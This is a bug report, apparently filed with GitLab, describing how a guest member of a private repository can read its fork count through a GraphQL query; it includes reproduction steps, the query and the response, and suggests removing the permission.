Number of forks on the private repository can be exposed via Graphql to a Guest member.
Greetings Team, Summary
The guest member of any private repository can query the number of forks the repository has had via graphql. At first, this doesn't pose a security threat as such, but I couldn't find the mention of this permission in the docs. Steps to reproduce
- Make a private repository with 3 users (any user would suffice, 3 is minimum to show the bug)
- Provide one with guest access, and the other with the developer access.
- With the account granted with the developer access fork the repository.
- Using the guest account query for
query pathLastCommit($projectPath: ID!) {
project(fullPath: $projectPath) {
forksCount
}
}
variables
{
"projectPath": "private_repository_name",
"path": "",
"ref": "master"
}
Response
{"data":{"project":{"forksCount":1}}}
What is the current bug behavior?
The guest user can see how many forks the repository has had, can be used for side-channel attacks.
What is the expected correct behavior?
Since it isn't listed in the privileges for the guest user, it shouldn't be allowed. Output of checks
This bug happens on GitLab.com
Impact
The guest user can see how many forks the repository has had, can be used for side-channel attacks. With known forks of the repository, it might be possible for the guest user to know any separate version of the code asides from the one in the private repository.
PS: I reported this to the HackerOne platform and as it was rightly pointed out it is a bug would be better suited here hence the format.
Possible fix
The permission to access the forksCount
as property should be removed, even with a very slight severity, I am sure this isn't intended behavior.